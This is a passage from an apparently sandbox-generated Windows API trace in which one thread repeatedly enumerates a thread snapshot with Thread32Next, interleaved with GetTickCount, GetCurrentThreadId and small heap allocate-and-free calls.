dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.234] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.235] GetTickCount () returned 0x1140dd6 [0235.235] GetCurrentThreadId () returned 0x5b4 [0235.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.235] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.236] GetTickCount () returned 0x1140dd6 [0235.236] GetCurrentThreadId () returned 0x5b4 [0235.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.236] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.237] GetTickCount () returned 0x1140dd6 [0235.237] GetCurrentThreadId () returned 0x5b4 [0235.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.237] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.238] GetTickCount () returned 0x1140dd6 [0235.238] GetCurrentThreadId () returned 0x5b4 [0235.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.238] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.239] GetTickCount () returned 0x1140dd6 [0235.239] GetCurrentThreadId () returned 0x5b4 [0235.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.239] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.240] GetTickCount () returned 0x1140dd6 [0235.240] GetCurrentThreadId () returned 0x5b4 [0235.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.240] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.241] GetTickCount () returned 0x1140de6 [0235.241] GetCurrentThreadId () returned 0x5b4 [0235.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.241] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.242] GetTickCount () returned 0x1140de6 [0235.242] GetCurrentThreadId () returned 0x5b4 [0235.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.242] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.243] GetTickCount () returned 0x1140de6 [0235.243] GetCurrentThreadId () returned 0x5b4 [0235.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.243] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.243] GetTickCount () returned 0x1140de6 [0235.244] GetCurrentThreadId () returned 0x5b4 [0235.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.244] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.244] GetTickCount () returned 0x1140de6 [0235.244] GetCurrentThreadId () returned 0x5b4 [0235.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.245] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.245] GetTickCount () returned 0x1140de6 [0235.245] GetCurrentThreadId () returned 0x5b4 [0235.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.245] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.246] GetTickCount () returned 0x1140de6 [0235.246] GetCurrentThreadId () returned 0x5b4 [0235.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.246] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.247] GetTickCount () returned 0x1140de6 [0235.247] GetCurrentThreadId () returned 0x5b4 [0235.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.247] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.248] GetTickCount () returned 0x1140de6 [0235.248] GetCurrentThreadId () returned 0x5b4 [0235.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.248] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.249] GetTickCount () returned 0x1140de6 [0235.249] GetCurrentThreadId () returned 0x5b4 [0235.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.249] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.250] GetTickCount () returned 0x1140de6 [0235.250] GetCurrentThreadId () returned 0x5b4 [0235.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.250] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.251] GetTickCount () returned 0x1140de6 [0235.251] GetCurrentThreadId () returned 0x5b4 [0235.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.251] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.252] GetTickCount () returned 0x1140de6 [0235.252] GetCurrentThreadId () returned 0x5b4 [0235.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.252] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.253] GetTickCount () returned 0x1140de6 [0235.253] GetCurrentThreadId () returned 0x5b4 [0235.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.253] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.254] GetTickCount () returned 0x1140de6 [0235.254] GetCurrentThreadId () returned 0x5b4 [0235.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.254] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.255] GetTickCount () returned 0x1140de6 [0235.255] GetCurrentThreadId () returned 0x5b4 [0235.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.255] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.255] GetTickCount () returned 0x1140de6 [0235.255] GetCurrentThreadId () returned 0x5b4 [0235.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.256] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.256] GetTickCount () returned 0x1140df6 [0235.256] GetCurrentThreadId () returned 0x5b4 [0235.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.257] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.257] GetTickCount () returned 0x1140df6 [0235.257] GetCurrentThreadId () returned 0x5b4 [0235.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.257] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.258] GetTickCount () returned 0x1140df6 [0235.258] GetCurrentThreadId () returned 0x5b4 [0235.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.258] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.259] GetTickCount () returned 0x1140df6 [0235.259] GetCurrentThreadId () returned 0x5b4 [0235.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.259] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.260] GetTickCount () returned 0x1140df6 [0235.260] GetCurrentThreadId () returned 0x5b4 [0235.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.260] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.261] GetTickCount () returned 0x1140df6 [0235.261] GetCurrentThreadId () returned 0x5b4 [0235.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.261] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.262] GetTickCount () returned 0x1140df6 [0235.262] GetCurrentThreadId () returned 0x5b4 [0235.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.262] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.263] GetTickCount () returned 0x1140df6 [0235.263] GetCurrentThreadId () returned 0x5b4 [0235.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.263] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.264] GetTickCount () returned 0x1140df6 [0235.264] GetCurrentThreadId () returned 0x5b4 [0235.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.264] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.265] GetTickCount () returned 0x1140df6 [0235.265] GetCurrentThreadId () returned 0x5b4 [0235.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.265] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.266] GetTickCount () returned 0x1140df6 [0235.266] GetCurrentThreadId () returned 0x5b4 [0235.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.266] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.266] GetTickCount () returned 0x1140df6 [0235.266] GetCurrentThreadId () returned 0x5b4 [0235.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.267] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.267] GetTickCount () returned 0x1140df6 [0235.267] GetCurrentThreadId () returned 0x5b4 [0235.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.267] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.268] GetTickCount () returned 0x1140df6 [0235.268] GetCurrentThreadId () returned 0x5b4 [0235.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.268] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.269] GetTickCount () returned 0x1140df6 [0235.269] GetCurrentThreadId () returned 0x5b4 [0235.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.269] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.270] GetTickCount () returned 0x1140df6 [0235.270] GetCurrentThreadId () returned 0x5b4 [0235.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.270] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.271] GetTickCount () returned 0x1140df6 [0235.271] GetCurrentThreadId () returned 0x5b4 [0235.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.271] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.272] GetTickCount () returned 0x1140e05 [0235.272] GetCurrentThreadId () returned 0x5b4 [0235.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.272] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.273] GetTickCount () returned 0x1140e05 [0235.273] GetCurrentThreadId () returned 0x5b4 [0235.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.273] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.274] GetTickCount () returned 0x1140e05 [0235.274] GetCurrentThreadId () returned 0x5b4 [0235.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.274] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.275] GetTickCount () returned 0x1140e05 [0235.275] GetCurrentThreadId () returned 0x5b4 [0235.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.275] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.276] GetTickCount () returned 0x1140e05 [0235.276] GetCurrentThreadId () returned 0x5b4 [0235.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.276] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.277] GetTickCount () returned 0x1140e05 [0235.277] GetCurrentThreadId () returned 0x5b4 [0235.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.277] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.278] GetTickCount () returned 0x1140e05 [0235.278] GetCurrentThreadId () returned 0x5b4 [0235.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.278] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.278] GetTickCount () returned 0x1140e05 [0235.278] GetCurrentThreadId () returned 0x5b4 [0235.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.279] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.279] GetTickCount () returned 0x1140e05 [0235.279] GetCurrentThreadId () returned 0x5b4 [0235.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.280] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.280] GetTickCount () returned 0x1140e05 [0235.280] GetCurrentThreadId () returned 0x5b4 [0235.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.280] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.281] GetTickCount () returned 0x1140e05 [0235.281] GetCurrentThreadId () returned 0x5b4 [0235.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.281] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.282] GetTickCount () returned 0x1140e05 [0235.282] GetCurrentThreadId () returned 0x5b4 [0235.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.282] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.283] GetTickCount () returned 0x1140e05 [0235.283] GetCurrentThreadId () returned 0x5b4 [0235.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.283] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.284] GetTickCount () returned 0x1140e05 [0235.284] GetCurrentThreadId () returned 0x5b4 [0235.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.284] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.285] GetTickCount () returned 0x1140e05 [0235.285] GetCurrentThreadId () returned 0x5b4 [0235.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.285] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.286] GetTickCount () returned 0x1140e05 [0235.286] GetCurrentThreadId () returned 0x5b4 [0235.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.286] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.287] GetTickCount () returned 0x1140e05 [0235.287] GetCurrentThreadId () returned 0x5b4 [0235.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.287] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.287] GetTickCount () returned 0x1140e15 [0235.287] GetCurrentThreadId () returned 0x5b4 [0235.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.288] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.288] GetTickCount () returned 0x1140e15 [0235.288] GetCurrentThreadId () returned 0x5b4 [0235.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.288] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.289] GetTickCount () returned 0x1140e15 [0235.289] GetCurrentThreadId () returned 0x5b4 [0235.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.289] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.290] GetTickCount () returned 0x1140e15 [0235.290] GetCurrentThreadId () returned 0x5b4 [0235.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.290] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.291] GetTickCount () returned 0x1140e15 [0235.291] GetCurrentThreadId () returned 0x5b4 [0235.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.291] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.292] GetTickCount () returned 0x1140e15 [0235.292] GetCurrentThreadId () returned 0x5b4 [0235.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.292] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.293] GetTickCount () returned 0x1140e15 [0235.293] GetCurrentThreadId () returned 0x5b4 [0235.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.293] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.294] GetTickCount () returned 0x1140e15 [0235.294] GetCurrentThreadId () returned 0x5b4 [0235.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.294] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.295] GetTickCount () returned 0x1140e15 [0235.295] GetCurrentThreadId () returned 0x5b4 [0235.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.295] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.296] GetTickCount () returned 0x1140e15 [0235.296] GetCurrentThreadId () returned 0x5b4 [0235.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.296] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.296] GetTickCount () returned 0x1140e15 [0235.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.297] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.297] GetTickCount () returned 0x1140e15 [0235.297] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.298] GetTickCount () returned 0x1140e15 [0235.298] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.299] GetTickCount () returned 0x1140e15 [0235.299] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.300] GetTickCount () returned 0x1140e15 [0235.300] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.301] GetTickCount () returned 0x1140e15 [0235.301] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.301] GetTickCount () returned 0x1140e15 [0235.301] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.302] GetTickCount () returned 0x1140e15 [0235.302] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.303] GetTickCount () returned 0x1140e24 [0235.303] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.304] GetTickCount () returned 0x1140e24 [0235.304] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.305] GetTickCount () returned 0x1140e24 [0235.305] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.305] GetTickCount () returned 0x1140e24 [0235.305] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.306] GetTickCount () returned 0x1140e24 [0235.306] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.307] GetTickCount () returned 0x1140e24 [0235.307] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.308] GetTickCount () returned 0x1140e24 [0235.308] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.309] GetTickCount () returned 0x1140e24 [0235.309] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.309] GetTickCount () returned 0x1140e24 [0235.309] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.310] GetTickCount () returned 0x1140e24 [0235.310] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.311] GetTickCount () returned 0x1140e24 [0235.311] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.312] GetTickCount () returned 0x1140e24 [0235.312] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.313] GetTickCount () returned 0x1140e24 